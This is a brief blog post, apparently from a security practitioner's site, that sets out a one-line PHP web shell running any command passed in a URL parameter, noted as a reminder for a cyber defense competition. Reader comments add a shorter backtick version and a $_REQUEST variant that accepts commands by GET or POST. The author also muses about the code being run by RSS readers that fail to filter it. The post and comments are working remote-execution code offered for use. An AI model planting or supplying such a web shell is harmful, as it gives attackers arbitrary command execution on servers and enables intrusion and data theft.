Top
Search
Subscribe
Social Media - Mubix
Login
Archives
« Issue a Linux command without it going into history | Main | Metasploit on Wintel Systems »
Tuesday
Mar012011

PHP Web Shell

DateTuesday, March 1, 2011 at 2:24PM

This is mostly for my memory for CCDC

<?php system($_GET['cmd']); ?>

I wonder what will happen if a RSS reader doesn't do proper filtering...

AuthorRob Fuller | Comments Off |
tagged

Reader Comments (4)

Even shorter, using the backtick operator and short tags :-)

<? `$_GET['c']`; ?>

March 2, 2011 | Unregistered Commentercdman

ok that's just pimp

March 2, 2011 | Registered CommenterRob Fuller

i prefer using $_REQUEST since you have multiple choice either to execute the command via POST or GET ..

March 3, 2011 | Unregistered Commentery0nd13

google

March 27, 2011 | Unregistered Commenterbonb
Comments for this entry have been disabled. Additional comments may not be added to this entry at this time.